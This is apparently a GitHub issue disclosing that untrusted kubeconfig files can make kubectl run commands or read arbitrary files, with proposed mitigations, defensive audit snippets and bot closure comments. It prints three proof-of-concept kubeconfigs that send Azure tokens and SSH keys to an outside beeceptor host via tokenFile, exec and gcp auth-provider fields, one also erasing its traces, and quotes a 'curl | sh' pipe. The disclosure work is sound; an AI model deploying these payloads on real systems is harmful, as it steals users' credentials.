
Unexpected consequences of using untrusted kubeconfig files #697

Closed
orymate opened this issue Aug 10, 2019 · 8 comments
Labels
lifecycle/rotten Denotes an issue or PR that has aged beyond stale and will be auto-closed.

Comments

@orymate

orymate commented Aug 10, 2019

We reached out to the Kubernetes security team with the following report; the only response within a week was from Brandon Philips, who advised us to open a public issue here.

We recently identified a security issue with kubeconfig files, especially when they are used to exchange credentials and to access Kubernetes API servers. It is common practice to make kubeconfig files available for download.

The issue is that most users are not aware that kubeconfig files can lead to the execution of malicious shell commands or to the exposure of arbitrary files. Security-aware interactive users and developers of automated systems do take care to inspect the contents of a kubeconfig file before use, but a kubeconfig is not something you trivially identify as a vulnerable interface.

There are two broad sets of issues:

  • A Kubeconfig file exposes users (Kubernetes administrators, developers) to the risk of their local systems being compromised.
  • Automated systems like public CI/CD services or other similar services (dashboards, service meshes, etc.) may be compromised through the SDK client executing insecure operations.

The first one primarily affects kubectl users, but we haven’t found any public discussion of this topic so far, nor a single warning in the documentation.

Our suggestion would be to start a discussion now and to consider some of the following solutions. Some of these are specific to kubectl, while others could be implemented in the Go client:

  • Build a user- or system-wide configurable list of commands that may be exec()-ed from a kubeconfig, much like /etc/shells on Unix systems. Installed packages, like the gcloud tool, could add themselves to the list.
  • Require all commands exec()-ed from a kubeconfig to live in ~/.kube/bin or another folder used for this single purpose, require commands to be basenames (no slashes), and use this folder as the only item of PATH. Administrators or package installers may create the needed symlinks.
  • Add a kubectl command-line flag and an SDK client config parameter that allows reading files outside the folder of the kubeconfig, or ~/.kube, or some other well-defined scope (InClusterConfig could set it as well).
  • Add an option to the SDK client to replace the Exec interface used for these functions, for example to restrict the environment variables to share, or to run the commands inside a restricted environment, such as separate K8s Tasks.
  • Create a “base” kubeconfig that is not replaced easily and, unlike the normal kubeconfig, can set sensitive values like the list of allowed commands. This might be controlled by a new env var and a default value.
  • Implement a better API server access/credentials interchange format that could be used independently of kubeconfig. It could contain a single cluster and user definition, and may reside in a place like ~/.kube/cluster.d or context.d. This might make it possible to keep the above-mentioned sensitive flags in the kubeconfig, which is not supposed to be replaced with another configuration as an everyday practice.
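The ~/.kube/bin allowlist idea could be prototyped independently of client-go. Below is a minimal sketch in Python, assuming the rules proposed above (bare basename, dedicated directory as the only search path, executable bit); the function name and error handling are purely illustrative, not part of any existing API:

```python
import os
import stat

def validate_exec_command(command: str, bin_dir: str) -> str:
    """Resolve an exec-plugin command against a dedicated allowlist
    directory: the command must be a bare basename and must exist as
    an executable entry in bin_dir (symlinks placed there by an
    administrator or package installer are allowed)."""
    if os.sep in command or (os.altsep and os.altsep in command):
        raise ValueError(f"exec command must be a basename: {command!r}")
    candidate = os.path.join(bin_dir, command)
    if not os.path.exists(candidate):
        raise ValueError(f"{command!r} is not installed in {bin_dir}")
    mode = os.stat(candidate).st_mode  # follows symlinks
    if not (stat.S_ISREG(mode) and mode & stat.S_IXUSR):
        raise ValueError(f"{candidate!r} is not an executable file")
    return candidate
```

A client could run such a check before invoking any exec credential helper and refuse the kubeconfig otherwise, which would neutralize the exec-based PoCs below.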

Below are a few examples illustrating the problem (run env KUBECONFIG=file kubectl version to try them):

  • Leak Azure tokens on the machine
  • Leak SSH private keys and remove traces
  • Leak ~/.ssh (private keys and known hosts) -- different method
==> dataleak-poc/file <==
# send any shorter single-line file readable by the user to an arbitrary address as a http header
# as an example, Azure credentials are in a single-line json, and can be easily leaked unless there are too many expired tokens
# in a kubernetes pod accepting kubeconfigs from users, this might be a mounted secret too

apiVersion: v1
kind: Config
clusters:
- cluster:
    server: 'https://eipu5nae.free.beeceptor.com'
  name: poc
contexts:
- context:
    cluster: poc
    user: poc
  name: poc
current-context: poc
users:
- name: poc
  user:
    tokenFile: ../.azure/accessTokens.json.dontdoit  # assume that this kubeconfig file is in ~/Downloads (and is not too long...)


==> exec-poc/file <==
# execute arbitrary commands with the exec authenticator
# in the example, leak the ssh keys (.pub is optional) and remove the traces
apiVersion: v1
clusters:
- cluster:
    server: https://eipu5nae.free.beeceptor.com/
  name: poc
contexts:
- context:
    cluster: poc
    user: poc
  name: poc
current-context: poc
kind: Config
preferences: {}
users:
- name: poc
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1alpha1
      command: sh
      args:
      - -c
      - "curl -d@../.ssh/id_rsa.pub https://eipu5nae.free.beeceptor.com/exec; sed -i -e '/exec:/,$ d' \"$KUBECONFIG\" || true"


==> gcp-auth-exec-poc/file <==
# execute arbitrary commands with the gcp auth provider
# in the example, leak the ssh keys
apiVersion: v1
clusters:
- cluster:
    server: https://eipu5nae.free.beeceptor.com/
  name: poc
contexts:
- context:
    cluster: poc
    user: poc
  name: poc
current-context: poc
kind: Config
preferences: {}
users:
- name: poc
  user:
    auth-provider:
      config:
        cmd-args: -c IFS=_;cmd="eval_tar_c_$HOME/.ssh.dontdoit|base64|curl_-d@-_https://eipu5nae.free.beeceptor.com";$cmd
        cmd-path: /bin/sh
      name: gcp
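Until safeguards like the ones suggested above exist, any system that accepts kubeconfigs from users could at least audit the parsed document for the fields exercised by the PoCs (exec, auth-provider, and local file references such as tokenFile). A hedged sketch in Python: it takes an already-parsed kubeconfig as a dict, the field names are the real ones used in the examples above, but the function itself is only illustrative:

```python
def audit_kubeconfig(config: dict) -> list:
    """Return findings for kubeconfig user fields that can run local
    commands or read arbitrary local files (see the PoCs above)."""
    findings = []
    for entry in config.get("users", []):
        name = entry.get("name", "<unnamed>")
        user = entry.get("user", {}) or {}
        if "exec" in user:  # exec credential plugin runs a command
            cmd = user["exec"].get("command")
            findings.append(f"user {name}: 'exec' runs {cmd!r} locally")
        if "auth-provider" in user:  # legacy providers may also exec
            ap = user["auth-provider"]
            cmd = (ap.get("config") or {}).get("cmd-path")
            findings.append(
                f"user {name}: auth-provider {ap.get('name')!r} may run {cmd!r}")
        for key in ("tokenFile", "client-key", "client-certificate"):
            if key in user:  # reads an arbitrary local path
                findings.append(
                    f"user {name}: {key} reads local file {user[key]!r}")
    return findings
```

An automated consumer could reject any kubeconfig with a non-empty findings list, or require explicit operator approval before using it.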
@fejta-bot

Issues go stale after 90d of inactivity.
Mark the issue as fresh with /remove-lifecycle stale.
Stale issues rot after an additional 30d of inactivity and eventually close.

If this issue is safe to close now please do so with /close.

Send feedback to sig-testing, kubernetes/test-infra and/or fejta.
/lifecycle stale

@k8s-ci-robot k8s-ci-robot added the lifecycle/stale Denotes an issue or PR has remained open with no activity and has become stale. label Nov 10, 2019
@fejta-bot

Stale issues rot after 30d of inactivity.
Mark the issue as fresh with /remove-lifecycle rotten.
Rotten issues close after an additional 30d of inactivity.

If this issue is safe to close now please do so with /close.

Send feedback to sig-testing, kubernetes/test-infra and/or fejta.
/lifecycle rotten

@k8s-ci-robot k8s-ci-robot added lifecycle/rotten Denotes an issue or PR that has aged beyond stale and will be auto-closed. and removed lifecycle/stale Denotes an issue or PR has remained open with no activity and has become stale. labels Dec 10, 2019
@fejta-bot

Rotten issues close after 30d of inactivity.
Reopen the issue with /reopen.
Mark the issue as fresh with /remove-lifecycle rotten.

Send feedback to sig-testing, kubernetes/test-infra and/or fejta.
/close

@k8s-ci-robot
Contributor

@fejta-bot: Closing this issue.

In response to this:

Rotten issues close after 30d of inactivity.
Reopen the issue with /reopen.
Mark the issue as fresh with /remove-lifecycle rotten.

Send feedback to sig-testing, kubernetes/test-infra and/or fejta.
/close

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.

@techdragon

/reopen

@k8s-ci-robot
Contributor

@techdragon: You can't reopen an issue/PR unless you authored it or you are a collaborator.

In response to this:

/reopen

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.

@neolit123
Member

neolit123 commented May 5, 2020

once a kubeconfig is downloaded from the internet, it's the responsibility of the administrator to verify its validity before using it.

similar goes for bash scripts:

curl -sfL https://somewebsite.com | sh -

^ this is a bad practice.

@morremeyer

morremeyer commented Mar 4, 2021

@neolit123 Bad practice or not: if we can prevent people from footgunning themselves, we should consider doing so.

@orymate could you reopen the issue, please?
